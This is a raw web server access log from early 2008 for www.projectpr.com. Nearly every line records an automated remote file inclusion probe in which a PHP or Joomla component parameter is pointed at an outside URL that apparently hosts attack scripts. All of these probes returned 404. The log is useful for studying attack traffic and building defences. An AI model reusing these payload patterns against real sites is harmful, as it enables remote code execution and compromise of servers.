213.161.204.3 - - [11/Jan/2008:23:50:47 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://bobatka.info/modules/language/asc/asc/r7? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
83.220.144.130 - - [11/Jan/2008:23:52:49 -0800] "GET ///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.pcr.ac.id/~rina/includes/file/mic.txt?? HTTP/1.1" 404 291 "-" "libwww-perl/5.808" "www.projectpr.com"
64.14.68.153 - - [11/Jan/2008:23:56:40 -0800] "GET ///components/com_extcalendar/admin_events.php?CONFIG_EXT%5BLANGUAGES_DIR%5D=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
62.116.117.149 - - [12/Jan/2008:00:00:13 -0800] "GET /logs/access_070912.log/index.php?log=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 278 "-" "libwww-perl/5.803" "www.projectpr.com"
217.107.222.17 - - [12/Jan/2008:00:00:31 -0800] "GET /logs/access.log/modules/xfsection/modify.php?dir_module=http://www.wordatwork.org/mambots/news.gif? HTTP/1.1" 404 290 "-" "libwww-perl/5.808" "www.projectpr.com"
217.107.222.17 - - [12/Jan/2008:00:00:31 -0800] "GET /modules/xfsection/modify.php?dir_module=http://www.wordatwork.org/mambots/news.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
217.107.222.17 - - [12/Jan/2008:00:00:32 -0800] "GET /logs/modules/xfsection/modify.php?dir_module=http://www.wordatwork.org/mambots/news.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
64.14.68.153 - - [12/Jan/2008:00:00:48 -0800] "GET ///components/com_extcalendar/admin_events.php?CONFIG_EXT%5BLANGUAGES_DIR%5D=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
83.220.144.130 - - [12/Jan/2008:00:01:10 -0800] "GET ///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.pcr.ac.id/~rina/includes/file/mic.txt?? HTTP/1.1" 404 291 "-" "libwww-perl/5.808" "www.projectpr.com"
72.16.148.38 - - [12/Jan/2008:00:02:24 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://89.106.23.150:32000/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.projectpr.com"
72.16.148.38 - - [12/Jan/2008:00:02:24 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://89.106.23.150:32000/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.projectpr.com"
210.240.50.2 - - [12/Jan/2008:00:05:47 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://89.106.23.150:32000/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.projectpr.com"
210.240.50.2 - - [12/Jan/2008:00:05:47 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://89.106.23.150:32000/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.projectpr.com"
195.62.12.248 - - [12/Jan/2008:00:06:09 -0800] "GET /logs/access.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
195.62.12.248 - - [12/Jan/2008:00:06:09 -0800] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
195.62.12.248 - - [12/Jan/2008:00:06:09 -0800] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
147.210.86.38 - - [12/Jan/2008:00:07:46 -0800] "GET /logs/access_070812.log/start.php?id=www.metalkia.org? HTTP/1.1" 404 278 "-" "libwww-perl/5.803" "www.projectpr.com"
147.210.86.38 - - [12/Jan/2008:00:07:46 -0800] "GET /start.php?id=www.metalkia.org? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
147.210.86.38 - - [12/Jan/2008:00:07:47 -0800] "GET /logs/start.php?id=www.metalkia.org? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
217.107.222.17 - - [12/Jan/2008:00:08:25 -0800] "GET /logs/access_070812.log/modules/xfsection/modify.php?dir_module=http://www.wordatwork.org/mambots/news.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
195.128.50.218 - - [12/Jan/2008:00:13:38 -0800] "GET /logs///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.pcr.ac.id/~rina/includes/file/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
195.128.50.218 - - [12/Jan/2008:00:13:39 -0800] "GET ///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.pcr.ac.id/~rina/includes/file/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
64.13.250.115 - - [12/Jan/2008:00:13:44 -0800] "GET /logs/access_070812.log//addpost_newpoll.php?addpoll=preview&thispath=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
64.13.250.115 - - [12/Jan/2008:00:13:44 -0800] "GET //addpost_newpoll.php?addpoll=preview&thispath=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
64.13.250.115 - - [12/Jan/2008:00:13:44 -0800] "GET /logs//addpost_newpoll.php?addpoll=preview&thispath=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
67.19.192.212 - - [12/Jan/2008:00:13:47 -0800] "GET /logs/access_070812.log//addpost_newpoll.php?addpoll=preview&thispath=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
67.19.192.212 - - [12/Jan/2008:00:13:47 -0800] "GET //addpost_newpoll.php?addpoll=preview&thispath=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
67.19.192.212 - - [12/Jan/2008:00:13:47 -0800] "GET /logs//addpost_newpoll.php?addpoll=preview&thispath=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
213.161.204.3 - - [12/Jan/2008:00:17:50 -0800] "GET /logs/access_070712.log/tools/send_reminders.php?noSet=0&includedir=http://www.crewfuck.kit.net/eval/safealba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
213.161.204.3 - - [12/Jan/2008:00:17:50 -0800] "GET /logs/access_070712.log/tools/send_reminders.php?noSet=0&includedir=http://bobatka.info/modules/language/asc/asc/r7? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
213.161.204.3 - - [12/Jan/2008:00:17:50 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.crewfuck.kit.net/eval/safealba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
213.161.204.3 - - [12/Jan/2008:00:17:51 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://bobatka.info/modules/language/asc/asc/r7? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
213.161.204.3 - - [12/Jan/2008:00:17:51 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.crewfuck.kit.net/eval/safealba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
213.161.204.3 - - [12/Jan/2008:00:17:51 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://bobatka.info/modules/language/asc/asc/r7? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
83.220.144.130 - - [12/Jan/2008:00:19:15 -0800] "GET /logs///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.pcr.ac.id/~rina/includes/file/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
83.220.144.130 - - [12/Jan/2008:00:21:13 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.pcr.ac.id/~rina/includes/file/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
83.220.144.130 - - [12/Jan/2008:00:23:51 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.pcr.ac.id/~rina/includes/file/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
85.10.138.63 - - [12/Jan/2008:00:24:00 -0800] "GET /logs/access.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 322 "-" "libwww-perl/5.803" "www.projectpr.com"
85.10.138.63 - - [12/Jan/2008:00:24:00 -0800] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 306 "-" "libwww-perl/5.803" "www.projectpr.com"
85.10.138.63 - - [12/Jan/2008:00:24:01 -0800] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
207.44.188.10 - - [12/Jan/2008:00:24:10 -0800] "GET //skin/zero_vote/error.php?dir=http://boringtime.com/banget??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.projectpr.com"
207.44.188.10 - - [12/Jan/2008:00:24:10 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://boringtime.com/banget??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.projectpr.com"
208.186.169.183 - - [12/Jan/2008:00:24:56 -0800] "GET //addpost_newpoll.php?addpoll=preview&thispath=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
64.14.68.153 - - [12/Jan/2008:00:26:03 -0800] "GET /logs///components/com_extcalendar/admin_events.php?CONFIG_EXT%5BLANGUAGES_DIR%5D=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
69.57.128.49 - - [12/Jan/2008:00:27:10 -0800] "GET //skin/zero_vote/error.php?dir=http://klein.no/UserFiles/Image/test/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
69.57.128.49 - - [12/Jan/2008:00:27:14 -0800] "GET //skin/zero_vote/error.php?dir=http://rmk.se/bilder/djd.txt??? HTTP/1.1" 404 271 "-" "libwww-perl/5.805" "www.projectpr.com"
69.10.155.237 - - [12/Jan/2008:00:28:26 -0800] "GET /logs/access.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.italianviper.altervista.org/php/php4/com.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
69.10.155.237 - - [12/Jan/2008:00:28:26 -0800] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.italianviper.altervista.org/php/php4/com.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
69.10.155.237 - - [12/Jan/2008:00:28:26 -0800] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.italianviper.altervista.org/php/php4/com.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
64.13.250.115 - - [12/Jan/2008:00:29:18 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
64.13.250.115 - - [12/Jan/2008:00:29:19 -0800] "GET //skin/zero_vote/error.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
64.13.250.115 - - [12/Jan/2008:00:29:19 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
67.19.192.212 - - [12/Jan/2008:00:29:31 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
67.19.192.212 - - [12/Jan/2008:00:29:31 -0800] "GET //skin/zero_vote/error.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
67.19.192.212 - - [12/Jan/2008:00:29:31 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
199.237.204.148 - - [12/Jan/2008:00:30:26 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.projectpr.com"
199.237.204.148 - - [12/Jan/2008:00:30:27 -0800] "GET //skin/zero_vote/error.php?dir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.projectpr.com"
199.237.204.148 - - [12/Jan/2008:00:30:27 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.0" 404 260 "-" "libwww-perl/5.53" "www.projectpr.com"
208.186.169.183 - - [12/Jan/2008:00:31:26 -0800] "GET /logs/access_070812.log//addpost_newpoll.php?addpoll=preview&thispath=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 289 "-" "libwww-perl/5.65" "www.projectpr.com"
208.186.169.183 - - [12/Jan/2008:00:31:26 -0800] "GET /logs//addpost_newpoll.php?addpoll=preview&thispath=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
64.14.68.153 - - [12/Jan/2008:00:32:00 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
64.14.68.153 - - [12/Jan/2008:00:32:10 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
69.57.128.49 - - [12/Jan/2008:00:32:59 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://klein.no/UserFiles/Image/test/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
69.57.128.49 - - [12/Jan/2008:00:33:00 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://rmk.se/bilder/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
69.57.128.49 - - [12/Jan/2008:00:33:00 -0800] "GET //skin/zero_vote/error.php?dir=http://rmk.se/bilder/djd.txt??? HTTP/1.1" 404 271 "-" "libwww-perl/5.805" "www.projectpr.com"
69.57.128.49 - - [12/Jan/2008:00:33:00 -0800] "GET //skin/zero_vote/error.php?dir=http://klein.no/UserFiles/Image/test/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
69.57.128.49 - - [12/Jan/2008:00:33:00 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://rmk.se/bilder/djd.txt??? HTTP/1.1" 404 276 "-" "libwww-perl/5.805" "www.projectpr.com"
69.57.128.49 - - [12/Jan/2008:00:33:00 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://klein.no/UserFiles/Image/test/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
151.1.141.17 - - [12/Jan/2008:00:34:10 -0800] "GET //skin/zero_vote/error.php?dir=http://rmk.se/bilder/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
74.6.28.107 - - [12/Jan/2008:00:34:28 -0800] "GET /navigation_bars/ HTTP/1.0" 200 807 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
69.57.128.49 - - [12/Jan/2008:00:36:13 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://klein.no/UserFiles/Image/test/djd.txt??? HTTP/1.1" 404 287 "-" "libwww-perl/5.805" "www.projectpr.com"
69.57.128.49 - - [12/Jan/2008:00:36:14 -0800] "GET //skin/zero_vote/error.php?dir=http://klein.no/UserFiles/Image/test/djd.txt??? HTTP/1.1" 404 271 "-" "libwww-perl/5.805" "www.projectpr.com"
69.57.128.49 - - [12/Jan/2008:00:36:14 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://klein.no/UserFiles/Image/test/djd.txt??? HTTP/1.1" 404 276 "-" "libwww-perl/5.805" "www.projectpr.com"
64.13.250.115 - - [12/Jan/2008:00:36:37 -0800] "GET /logs/access_070912.log//login.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 279 "-" "libwww-perl/5.79" "www.projectpr.com"
64.13.250.115 - - [12/Jan/2008:00:36:37 -0800] "GET //login.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 269 "-" "libwww-perl/5.79" "www.projectpr.com"
64.13.250.115 - - [12/Jan/2008:00:36:37 -0800] "GET /logs//login.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 274 "-" "libwww-perl/5.79" "www.projectpr.com"
67.19.192.212 - - [12/Jan/2008:00:37:01 -0800] "GET /logs/access_070912.log//login.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
67.19.192.212 - - [12/Jan/2008:00:37:01 -0800] "GET //login.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
67.19.192.212 - - [12/Jan/2008:00:37:01 -0800] "GET /logs//login.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
64.22.240.103 - - [12/Jan/2008:00:37:32 -0800] "GET ///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.pcr.ac.id/~rina/includes/file/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
64.22.240.103 - - [12/Jan/2008:00:37:35 -0800] "GET ///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.pcr.ac.id/~rina/includes/file/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
89.108.85.55 - - [12/Jan/2008:00:37:41 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
89.108.85.55 - - [12/Jan/2008:00:37:41 -0800] "GET //skin/zero_vote/error.php?dir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
89.108.85.55 - - [12/Jan/2008:00:37:42 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
64.14.68.153 - - [12/Jan/2008:00:40:25 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt?? HTTP/1.1" 404 295 "-" "libwww-perl/5.803" "www.projectpr.com"
195.128.50.218 - - [12/Jan/2008:00:41:09 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.pcr.ac.id/~rina/includes/file/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
195.128.50.218 - - [12/Jan/2008:00:41:10 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.pcr.ac.id/~rina/includes/file/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
195.128.50.218 - - [12/Jan/2008:00:41:20 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.pcr.ac.id/~rina/includes/file/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
195.128.50.218 - - [12/Jan/2008:00:41:20 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.pcr.ac.id/~rina/includes/file/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
69.57.128.49 - - [12/Jan/2008:00:41:32 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://rmk.se/bilder/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
69.57.128.49 - - [12/Jan/2008:00:41:32 -0800] "GET //skin/zero_vote/error.php?dir=http://rmk.se/bilder/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
69.57.128.49 - - [12/Jan/2008:00:41:32 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://rmk.se/bilder/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
83.220.144.130 - - [12/Jan/2008:00:42:00 -0800] "GET //skin/zero_vote/error.php?dir=http://seucu.us/pbot.txt?? HTTP/1.1" 404 271 "-" "libwww-perl/5.808" "www.projectpr.com"
83.220.144.130 - - [12/Jan/2008:00:42:55 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.pcr.ac.id/~rina/includes/file/mic.txt?? HTTP/1.1" 404 300 "-" "libwww-perl/5.808" "www.projectpr.com"
208.186.169.183 - - [12/Jan/2008:00:43:12 -0800] "GET //login.php?dir=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
151.1.141.17 - - [12/Jan/2008:00:43:25 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://rmk.se/bilder/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
151.1.141.17 - - [12/Jan/2008:00:43:25 -0800] "GET //skin/zero_vote/error.php?dir=http://rmk.se/bilder/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
151.1.141.17 - - [12/Jan/2008:00:43:26 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://rmk.se/bilder/djd.txt??? HTTP/1.1" 404 276 "-" "libwww-perl/5.79" "www.projectpr.com"
83.220.144.130 - - [12/Jan/2008:00:44:10 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.pcr.ac.id/~rina/includes/file/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
208.186.169.183 - - [12/Jan/2008:00:49:03 -0800] "GET //skin/zero_vote/error.php?dir=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
83.220.144.130 - - [12/Jan/2008:00:50:58 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.pcr.ac.id/~rina/includes/file/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
83.220.144.130 - - [12/Jan/2008:00:53:51 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.pcr.ac.id/~rina/includes/file/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
209.216.205.192 - - [12/Jan/2008:00:54:52 -0800] "GET /logs/access.log//administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://mysunsethouse-lombok.com/images/.../.../on.txt? HTTP/1.1" 404 324 "-" "libwww-perl/5.79" "www.projectpr.com"
209.216.205.192 - - [12/Jan/2008:00:54:52 -0800] "GET //administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://mysunsethouse-lombok.com/images/.../.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
209.216.205.192 - - [12/Jan/2008:00:54:53 -0800] "GET /logs//administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://mysunsethouse-lombok.com/images/.../.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
64.14.68.153 - - [12/Jan/2008:00:54:58 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
209.216.205.192 - - [12/Jan/2008:00:55:00 -0800] "GET //administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://mysunsethouse-lombok.com/images/.../.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
64.14.68.153 - - [12/Jan/2008:00:55:34 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
64.14.68.153 - - [12/Jan/2008:00:56:05 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
